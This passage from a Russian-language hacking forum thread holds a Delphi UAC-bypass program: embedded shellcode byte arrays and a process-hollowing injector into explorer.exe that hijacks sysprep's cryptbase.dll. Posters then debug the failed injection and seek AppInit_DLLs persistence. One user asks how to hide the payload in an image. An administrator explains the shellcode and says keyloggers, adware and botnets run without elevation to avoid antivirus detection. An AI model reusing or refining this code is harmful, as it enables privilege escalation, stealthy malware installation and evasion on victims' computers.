    $62, $05, $B8, $48, $E6, $4C, $CB, $B2, $05, $B0, $70, $B4, $38, $25, $D1, $67, $C3, $70, $E1, $75, $A0, $FD, $A4, $40, $88, $04, $AC, $E4, $12, $9A, $1F, $76, $31, $24, $5C, $39, $D8, $43, $F2, $00, $B9, $3A, $3A, $01, $D8, $65, $7B, $A1, $C0, $83, $4E, $6C, $3D, $89, $5E, $0C, $02, $08, $B3, $F1, $6D, $B5, $10, $65, $E3, $0C, $47, $D7, $B6, $40, $D7, $76, $60, $B8, $BB, $56, $18, $32, $40, $57, $7A, $23, $B0, $75, $83, $C5, $64, $5A, $14, $98, $B8, $8B, $AB, $5C, $32, $50, $85, $B5, $6F, $C8, $FB, $BF,
    $02, $6F, $28, $90, $F3, $FE, $78, $11, $8B, $4C, $C9, $DD, $5D, $58, $F8, $3B, $41, $08, $7D, $9C, $49, $93, $04, $81, $AA, $07, $83, $38, $BD, $E7, $2A, $6D, $FF, $02, $FC, $96, $24, $20, $4B, $EE, $F6, $D7, $28, $20, $24, $1B, $8B, $51, $E7, $04, $82, $20, $47, $FF, $9B, $6B, $17, $B6, $31, $57, $FF, $A6, $B9, $F9, $4E, $FD, $90, $50, $CB, $BD, $8D, $A5, $83, $F1, $51, $C1, $00, $BC, $3A, $8E, $0D, $F6, $8D, $43, $C6, $E2, $6A, $20, $6A, $08, $9B, $D7, $B7, $5C, $FB, $AE, $D2, $50, $0C, $83, $66, $10,
    $00, $CD, $09, $2D, $46, $14, $65, $EF, $70, $74, $06, $10, $13, $0A, $C1, $E0, $02, $50, $2A, $35, $68, $81, $8E, $21, $5F, $73, $5E, $6C, $D2, $EB, $3A, $07, $9C, $AF, $56, $BC, $08, $1F, $3D, $6D, $77, $0D, $5A, $95, $1E, $F0, $74, $06, $1B, $54, $D7, $AD, $6C, $B6, $45, $59, $2E, $26, $D2, $13, $C4, $F6, $5B, $77, $FB, $8B, $11, $85, $D2, $DC, $89, $42, $08, $89, $73, $01, $83, $C0, $08, $C3, $DF, $C2, $12, $DD, $1E, $83, $E8, $06, $10, $39, $09, $89, $0F, $B7, $6D, $07, $85, $15, $39, $83, $61, $71,
    $EB, $0B, $48, $04, $57, $DA, $B6, $60, $10, $AE, $50, $0A, $51, $BD, $F2, $44, $1F, $04, $04, $67, $C5, $6A, $DD, $C1, $97, $8B, $08, $18, $61, $D8, $E3, $33, $0C, $C7, $6B, $FE, $CA, $07, $B9, $00, $09, $33, $10, $10, $A1, $08, $83, $CE, $BE, $DD, $3F, $8B, $0D, $21, $51, $9A, $A3, $EF, $B2, $D7, $0D, $BB, $5D, $C3, $CC, $00, $4F, $A1, $12, $27, $D8, $D8, $B7, $10, $D0, $15, $0C, $52, $62, $DC, $2F, $1B, $05, $BE, $5F, $83, $EC, $08, $A1, $6D, $03, $83, $87, $F8, $FC, $12, $FF, $63, $35, $10, $83, $E9,
    $04, $39, $4D, $F8, $7C, $33, $3E, $F8, $81, $C2, $00, $40, $EF, $16, $FB, $0C, $99, $3F, $10, $82, $F6, $05, $50, $25, $C8, $96, $CC, $6C, $64, $51, $57, $8C, $1C, $7B, $83, $8F, $B1, $7E, $03, $E5, $FC, $CE, $0C, $03, $4D, $54, $2C, $0C, $BB, $6F, $0D, $5D, $8B, $0E, $E5, $5D, $D6, $19, $68, $64, $64, $6C, $C4, $05, $C8, $CC, $D0, $62, $82, $A2, $92, $98, $20, $04, $02, $28, $69, $B6, $22, $52, $40, $00, $49, $0A, $86, $20, $02, $C0, $04, $78, $B3, $CB, $BF, $6C, $D8, $30, $01, $48, $65, $61, $70, $43,
    $72, $74, $65, $0B, $DB, $B6, $DF, $FE, $44, $65, $73, $74, $72, $6F, $79, $0C, $45, $78, $69, $74, $50, $09, $63, $0F, $73, $0C, $7D, $DB, $FE, $7F, $47, $65, $74, $4D, $6F, $64, $75, $6C, $65, $48, $61, $6E, $64, $05, $41, $11, $43, $6C, $6F, $73, $B5, $BF, $DC, $82, $0D, $2B, $49, $6E, $69, $61, $6C, $69, $7A, $65, $4A, $7D, $EC, $F6, $D6, $09, $63, $0A, $53, $65, $63, $07, $6F, $6E, $39, $43, $6F, $6D, $6D, $65, $DB, $EF, $DD, $28, $4C, $69, $6E, $38, $10, $75, $72, $71, $6E, $5D, $7E, $96, $AC, $FB,
    $44, $75, $70, $6C, $34, $74, $4F, $90, $50, $69, $70, $65, $B6, $DF, $B0, $C7, $2F, $53, $74, $64, $19, $A2, $41, $6C, $7B, $63, $BE, $ED, $66, $C9, $24, $44, $58, $57, $61, $7A, $46, $6F, $72, $53, $DD, $9C, $7B, $DB, $66, $67, $29, $4F, $62, $6A, $81, $C5, $66, $65, $72, $6F, $65, $DB, $94, $94, $4C, $39, $76, $AA, $5B, $0B, $B1, $83, $B5, $46, $54, $65, $52, $65, $67, $2A, $85, $0D, $AE, $FD, $34, $C0, $6D, $65, $6D, $F2, $53, $20, $6E, $C3, $62, $5B, $EC, $63, $70, $79, $08, $69, $6E, $07, $0F, $DA,
    $CD, $66, $73, $C5, $31, $90, $24, $31, $53, $68, $65, $43, $AC, $B5, $B6, $15, $48, $60, $75, $85, $06, $A3, $00, $FF, $BF, $F9, $7F, $10, $40, $20, $0D, $08, $10, $0E, $F0, $63, $0F, $06, $0A, $11, $0A, $18, $09, $0A, $05, $06, $0E, $13, $AB, $4F, $18, $0D, $FF, $FB, $FF, $FF, $BA, $44, $39, $2B, $32, $0F, $1E, $06, $0D, $33, $40, $0E, $34, $0A, $07, $07, $10, $32, $C5, $06, $15, $07, $2D, $06, $16, $76, $0A, $2B, $FD, $DB, $DF, $FE, $20, $06, $21, $06, $54, $06, $13, $2D, $0A, $09, $09, $07, $05, $13,
    $03, $06, $07, $16, $0C, $17, $05, $0A, $F8, $76, $FB, $DB, $0C, $05, $12, $4E, $00, $50, $45, $60, $4C, $01, $07, $FA, $BF, $34, $53, $2C, $FF, $07, $23, $8A, $E0, $00, $0E, $21, $0B, $01, $02, $32, $00, $0C, $0A, $BE, $60, $83, $9D, $10, $03, $30, $0D, $0B, $02, $A4, $9B, $05, $D9, $1E, $04, $07, $0C, $70, $64, $CB, $0E, $BB, $03, $38, $10, $07, $4A, $B3, $6F, $F9, $BA, $47, $46, $2A, $40, $50, $14, $50, $17, $48, $C1, $32, $65, $02, $60, $C8, $23, $0F, $64, $DD, $55, $C0, $57, $6C, $1F, $2E, $63, $6F,
    $C2, $DE, $61, $CD, $64, $65, $B0, $90, $02, $B7, $7D, $93, $DD, $85, $E6, $20, $2E, $88, $78, $74, $10, $4A, $08, $85, $03, $D8, $08, $0F, $06, $27, $72, $64, $C9, $46, $36, $79, $B6, $61, $4F, $56, $30, $D0, $B1, $C9, $EE, $ED, $92, $40, $2E, $26, $10, $14, $03, $73, $58, $63, $9B, $B2, $12, $27, $C0, $4F, $73, $1B, $42, $23, $80, $0C, $76, $50, $4F, $16, $7F, $32, $C8, $37, $46, $74, $C8, $27, $60, $18, $F7, $75, $7C, $53, $42, $1B, $2C, $50, $7B, $7C, $D8, $04, $00, $00, $00, $00, $00, $40, $02, $00,
    $FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $7C, $24, $08, $01, $0F, $85, $86, $01, $00, $00, $60, $BE, $15, $80, $00, $10, $8D, $BE, $EB, $8F, $FF, $FF, $57, $EB, $10, $90, $90, $90, $90, $90, $90, $8A, $06, $46, $88, $07, $47, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $72, $ED, $B8, $01, $00, $00, $00, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C0, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $31, $C9, $83, $E8, $03, $72, $0D,
    $C1, $E0, $08, $8A, $06, $46, $83, $F0, $FF, $74, $74, $89, $C5, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $75, $20, $41, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $83, $C1, $02, $81, $FD, $00, $F3, $FF, $FF, $83, $D1, $01, $8D, $14, $2F, $83, $FD, $FC, $76, $0F, $8A, $02, $42, $88, $07, $47, $49, $75, $F7, $E9, $63, $FF,
    $FF, $FF, $90, $8B, $02, $83, $C2, $04, $89, $07, $83, $C7, $04, $83, $E9, $04, $77, $F1, $01, $CF, $E9, $4C, $FF, $FF, $FF, $5E, $8D, $BE, $00, $60, $00, $00, $8B, $07, $09, $C0, $74, $3C, $8B, $5F, $04, $8D, $84, $30, $00, $80, $00, $00, $01, $F3, $50, $83, $C7, $08, $FF, $96, $50, $80, $00, $00, $95, $8A, $07, $47, $08, $C0, $74, $DC, $89, $F9, $57, $48, $F2, $AE, $55, $FF, $96, $54, $80, $00, $00, $09, $C0, $74, $07, $89, $03, $83, $C3, $04, $EB, $E1, $61, $31, $C0, $C2, $0C, $00, $83, $C7, $04, $8D,
    $5E, $FC, $31, $C0, $8A, $07, $47, $09, $C0, $74, $22, $3C, $EF, $77, $11, $01, $C3, $8B, $03, $86, $C4, $C1, $C0, $10, $86, $C4, $01, $F0, $89, $03, $EB, $E2, $24, $0F, $C1, $E0, $10, $66, $8B, $07, $83, $C7, $02, $EB, $E2, $8B, $AE, $58, $80, $00, $00, $8D, $BE, $00, $F0, $FF, $FF, $BB, $00, $10, $00, $00, $50, $54, $6A, $04, $53, $57, $FF, $D5, $8D, $87, $9F, $01, $00, $00, $80, $20, $7F, $80, $60, $28, $7F, $58, $50, $54, $50, $53, $57, $FF, $D5, $58, $61, $8D, $44, $24, $80, $6A, $00, $39, $C4, $75,
    $FA, $83, $EC, $80, $E9, $0A, $86, $FF, $FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $78, $90, $00, $00, $50, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $85, $90, $00, $00, $68, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $90, $90, $00, $00, $70, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $9C, $90, $00,
    $00, $AA, $90, $00, $00, $BA, $90, $00, $00, $CA, $90, $00, $00, $D8, $90, $00, $00, $00, $00, $00, $00, $E6, $90, $00, $00, $00, $00, $00, $00, $EE, $90, $00, $00, $00, $00, $00, $00, $4B, $45, $52, $4E, $45, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $4D, $53, $56, $43, $52, $54, $2E, $64, $6C, $6C, $00, $53, $48, $45, $4C, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $00, $00, $4C, $6F, $61, $64, $4C, $69, $62, $72, $61, $72, $79, $41, $00, $00, $47, $65, $74, $50, $72, $6F, $63, $41, $64, $64, $72, $65, $73,
    $73, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $50, $72, $6F, $74, $65, $63, $74, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $41, $6C, $6C, $6F, $63, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $46, $72, $65, $65, $00, $00, $00, $6D, $65, $6D, $73, $65, $74, $00, $00, $53, $68, $65, $6C, $6C, $45, $78, $65, $63, $75, $74, $65, $45, $78, $41, $00, $00, $00, $00, $00, $FA, $BF, $34, $53, $00, $00, $00, $00, $32, $91, $00, $00, $01, $00, $00, $00, $01, $00, $00, $00, $01, $00, $00, $00, $28, $91, $00,
    $00, $2C, $91, $00, $00, $30, $91, $00, $00, $77, $10, $00, $00, $3B, $91, $00, $00, $00, $00, $54, $65, $73, $74, $2E, $64, $6C, $6C, $00, $4D, $79, $46, $75, $6E, $63, $74, $69, $6F, $6E, $00, $00, $00, $00, $80, $00, $00, $0C, $00, $00, $00, $6D, $38, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);

const
  LogEnable = 1;

function NtUnmapViewOfSection(ProcessHandle: DWORD; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll';

type
  PImageBaseRelocation = ^TImageBaseRelocation;

  TImageBaseRelocation = packed record
    VirtualAddress: DWORD;
    SizeOfBlock: DWORD;
  end;

procedure PerformBaseRelocation(f_module: Pointer; INH: PImageNtHeaders; f_delta: Cardinal); stdcall;
var
  l_i: Cardinal;
  l_codebase: Pointer;
  l_relocation: PImageBaseRelocation;
  l_dest: Pointer;
  l_relInfo: ^Word;
  l_patchAddrHL: ^DWord;
  l_type, l_offset: integer;
begin
  l_codebase := f_module;
  if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
  begin
    l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
    while l_relocation.VirtualAddress > 0 do
    begin
      l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
      l_relInfo := Pointer(Cardinal(l_relocation) + 8);
      for l_i := 0 to (trunc(((l_relocation.SizeOfBlock - 8) / 2)) - 1) do
      begin
        l_type := (l_relInfo^ shr 12);
        l_offset := l_relInfo^ and $FFF;
        if l_type = 3 then
        begin
          l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
          l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
        end;
        inc(l_relInfo);
      end;
      l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
    end;
  end;
end;

function LogFileAdd(Line: string): integer;
var
  F: TextFile;
  FileName: string;
  today: TDateTime;
begin
  if LogEnable = 1 then
  begin
    FileName := ('D:\system.log');
    AssignFile(F, FileName);
    if FileExists(FileName) then
      Append(F)
    else
      Rewrite(F);
    today := Now;
    WriteLn(F, TimeToStr(today), ' ', Line);
    CloseFile(F);
  //  Writeln(TimeToStr(today), ' ', Line);
    Result := 1;
  end;
end;

function AlignImage(pImage: Pointer): Pointer;
var
  IDH: PImageDosHeader;
  INH: PImageNtHeaders;
  ISH: PImageSectionHeader;
  i: WORD;
begin
  IDH := pImage;
  INH := Pointer(Integer(pImage) + IDH^._lfanew);
  GetMem(Result, INH^.OptionalHeader.SizeOfImage);
  ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
  CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
  for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
  begin
    ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
    CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
  end;
end;

function Get4ByteAlignedContext(var Base: PContext): PContext;
begin
  Base := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
  Result := Base;
  if Base <> nil then
    while ((DWORD(Result) mod 4) <> 0) do
      Result := Pointer(DWORD(Result) + 1);
end;

function ExecuteFromMem(szFilePath, szParams: string; pFile: Pointer): DWORD;
var
  PI: TProcessInformation;
  SI: TStartupInfo;
  CT: PContext;
  CTBase: PContext;
  IDH: PImageDosHeader;
  INH: PImageNtHeaders;
  dwImageBase: DWORD;
  pModule: Pointer;
  dwNull: SIZE_T;
begin
  if szParams <> '' then
    szParams := '"' + szFilePath + '" ' + szParams;

  Result := 0;
  IDH := pFile;
  if IDH^.e_magic = IMAGE_DOS_SIGNATURE then
  begin
    INH := Pointer(Integer(pFile) + IDH^._lfanew);
    if INH^.Signature = IMAGE_NT_SIGNATURE then
    begin
      FillChar(SI, SizeOf(TStartupInfo), #0);
      FillChar(PI, SizeOf(TProcessInformation), #0);
      SI.cb := SizeOf(TStartupInfo);
      if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
      begin
        CT := Get4ByteAlignedContext(CTBase);
        if CT <> nil then
        begin
          CT.ContextFlags := CONTEXT_FULL;
          if GetThreadContext(PI.hThread, CT^) then
          begin
            ReadProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @dwImageBase, 4, dwNull);
            if dwImageBase = INH^.OptionalHeader.ImageBase then
            begin
              if NtUnmapViewOfSection(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)) = 0 then
                pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
              else
                pModule := VirtualAllocEx(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            end
            else
              pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if pModule <> nil then
            begin
              pFile := AlignImage(pFile);
              if DWORD(pModule) <> INH^.OptionalHeader.ImageBase then
              begin
                PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
                INH^.OptionalHeader.ImageBase := DWORD(pModule);
                CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
              end;
              WriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwNull);
              WriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwNull);
              CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;
              SetThreadContext(PI.hThread, CT^);
              ResumeThread(PI.hThread);
              Result := PI.hThread;
            end;
          end;
          VirtualFree(CTBase, 0, MEM_RELEASE);
        end;
        if Result = 0 then
          TerminateProcess(PI.hProcess, 0);
      end;
    end;
  end;
end;

function mFileToStr(Ruta: ansistring): ansistring;
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  Result := '';
  sFile := _lopen(PansiChar(Ruta), OF_READ);
  uBytes := GetFileSize(sFile, nil);
  SetLength(Result, uBytes);
  _lread(sFile, @Result[1], uBytes);
  _lclose(sFile);
end;

procedure mWriteFileFromStr(Cadena, Ruta: ansistring);
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  sFile := _lcreat(PansiChar(Ruta), 0);
  uBytes := Length(Cadena);
  _lwrite(sFile, @Cadena[1], uBytes);
  _lclose(sFile);
end;

function IsUserAnAdmin: integer; external 'shell32';

function Bypass: bool;
var
  Yo: ansistring;
  DllD: ansistring;
  psinfo: pshellexecuteinfow;
  tmpdir: array[0..MAX_PATH] of char;
  windir: array[0..MAX_PATH] of char;
  sysdir: array[0..MAX_PATH] of char;
  tmp: string;
  sys: string;
  win: string;
  sysprp: string;
  InjectCount, InjectStatus: integer;

begin
  InjectStatus := 0;
  InjectCount := 10;
  Result := False;
  GetTempPath(MAX_PATH, tmpdir);
  GetSystemDirectory(sysdir, MAX_PATH);
  GetWindowsDirectory(windir, MAX_PATH);
  win := windir + '\explorer.exe';
  sys := sysdir + '\sysprep\cryptbase.dll';
  sysprp := sysdir + '\sysprep\sysprep.exe';
  tmp := tmpdir + 'cryptbase.dll';

  if isuseranadmin = 1 then
  begin
    Result := True;
    while fileexists(sys) do
      deletefile(sys);
    deletefile(tmp);
  end
  else
  begin
    if ansiuppercase(ExtractFileName(paramstr(0))) <> 'EXPLORER.EXE' then
    begin
      Yo := mfiletostr(paramstr(0));
      SetLength(DllD, SizeOf(DllDummy));
      CopyMemory(@DllD[1], @DllDummy[0], SizeOf(DllDummy));
      mWriteFileFromStr(DllD, tmp);

      while InjectCount > 0 do
      begin

        // Инжектирование
        InjectStatus := ExecuteFromMem(win, paramstr(0), @FOp[0]);

        if InjectStatus = 0 then
        begin
          InjectCount := InjectCount - 1;
          sleep(100);  // Защитная задержка цикла инжекции (Иначе ЦП будет перегружен)
          LogFileAdd('Ошибка инжекции FOp, блок памяти занят ! повтор...');
        end
        else
        begin
          InjectCount := 0;
          LogFileAdd('Инжекция FOp выполнена успешно PI.hThread:' + IntToStr(InjectStatus));
        end;
      end;

      while InjectCount > 0 do
      begin

        // Инжектирование
        InjectStatus := ExecuteFromMem(win, paramstr(0), @Yo[1]);

        if InjectStatus = 0 then
        begin
          InjectCount := InjectCount - 1;
          sleep(100);  // Защитная задержка цикла инжекции (Иначе ЦП будет перегружен)
          LogFileAdd('Ошибка инжекции Yo, блок памяти занят ! повтор...');
        end
        else
        begin
          InjectCount := 0;
          LogFileAdd('Инжекция Yo выполнена успешно PI.hThread:' + IntToStr(InjectStatus));
        end;
      end;

      exitprocess(0);
    end
    else
    begin
      New(psInfo);
      psinfo.cbSize := sizeof(shellexecuteinfo);
      psinfo.fMask := SEE_MASK_INVOKEIDLIST;
      psinfo.lpVerb := 'open';
      PSINFO.lpFile := PWideChar(sysprp);
      psinfo.lpParameters := PWideChar(paramstr(1));
      psinfo.nShow := SW_SHOWNORMAL;
      shellexecuteexw(psinfo);
      exitprocess(0);
    end;
  end;
end;

begin

  if (Bypass) then
  begin
    LogFileAdd('Soy admin')
  end
  else
  begin
    LogFileAdd('No admin');
  end;

end.

Получаю:

19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...

Я так понимаю не инжектится певая константа (FOp: array) откуда информация о наборе байт FOp, и просвятите если не сложно как вы эти байты составили ? В ручную больно муторно. (Это если не затруднит)

И еще инжект параметра paramstr(0) это в самого себя, имеет ли это смысл ?

Нужна возможность записи в ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppinitDlls, может быть есть более изящные методы без инжекта в довереный процесс ?
 
Последнее редактирование:

adammi

гудериан -первобытный
Форумчанин
Регистрация
01.03.2016
Сообщения
114
Репутация
23
прочитал и усвоил спасибо а скажите пожалуйста как сделать чтоб картинка не вылазила и по возможности впихнуть это (добро) в картинку и чтоб по тихому все было как-то через видео все понятнее
ps. код переделывать не умеюfear
 

Hunchback

Пользователь
Форумчанин
Регистрация
23.10.2016
Сообщения
13
Репутация
1
прочитал и усвоил спасибо а скажите пожалуйста как сделать чтоб картинка не вылазила и по возможности впихнуть это (добро) в картинку и чтоб по тихому все было как-то через видео все понятнее
ps. код переделывать не умеюfear

Ты откуда сорвался ? Какая картинка ?

X-Shar - было бы не плохо разобраться что за набор байтов в FOp. Мне админские права как бы и не нужны, все и без них пашет, вопрос только в получении прав на запись в реестр AppInitDLL
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
FOp и DllDummy это не просто блоки памяти, это основная программа, реализующее уязвимость, которую кстати уже профиксили в винде...

Что-бы просмотреть что-там такое, вам нужно либо дизасеблировать код, либо в ольке посмотреть что-там, тем самым и отладите программу !

Делфи в данном случае выполняет-лишь роль загрузки и исполнения этого кода !

Что-то больше не скажу ибо нужно разбираться, когда я этим занимался, все работало вроде...

Нужна возможность записи в ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppinitDlls,
Вообще это автозагрузка-же, делайте из под уак, не помню как ветка называется, но из под уака можно писать в ветку автозагрузки пользователя...

Вообще обходить уак смысла нет, по следующим причинам:

1. Спокойно можно работать под уаком дя 90% решения всех задач;

2. Уак нетак просто обойти сейчас, а обход череват возникновением ненужных багов и доп. детекта.
 

Hunchback

Пользователь
Форумчанин
Регистрация
23.10.2016
Сообщения
13
Репутация
1
Можно писать в автозагрузку с правами пользователя, но в этом случае программа так же будет стартовать с правами пользователя и это дюже палевно, X-Shar может есть нечто о котором я не знаю ? Ключей у меня нет чтобы подписаться на довереный участок.

Мне бы понять как этот ассемблерный код составляется, от чего они отталкиваются чтобы начать сие деяние, поняв смысл масштабов партии ЦК можно делать не школьные вещи.

Олю знаю в совершенстве, но даже это не дает мне каких либо средств для манипуляции, это какой то конкретный баг в конкретной версии windows ? Который уже давно пропатчили.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
но в этом случае программа так же будет стартовать с правами пользователя и это дюже палевно
А в чем палевность, повышение привелегий - Это повод аверам "задуматься" не вирус-ли это...

А так из-под пользователя всё можно делать, нормально работает и кейлоггер и адварь, ботнеты...Не въехал!!!

это какой то конкретный баг в конкретной версии windows ? Который уже давно пропатчили.
Если всё верно помню, это баг 2014 года, причём для 7-ки, по крайне мере я несмог заюзать для 8-ки...Не въехал!!!

Вот вкратце как это работает:

Сама программа обхода в данном случае написана на асме и откомпилирована, далее берутся эти откомпилированные байты, в данном случаи массивы байт FOp и DllDummy...

Далее что-бы повысить себе права, запускаются эти программы в своей проге, смысл в том-что в данном случае не нужно знать асм, или тех. тонкости уязвимости, а достаточно только уметь запустить этот так-называемы шелл-код ! :)

Данный-же шелл код, по мойму ещё и для x32, а вообще попробуйте ещё этот исходник:Вопрос - Обход UAC (Bypass UAC)

Он по свежее, может поможет чем !
 
Верх Низ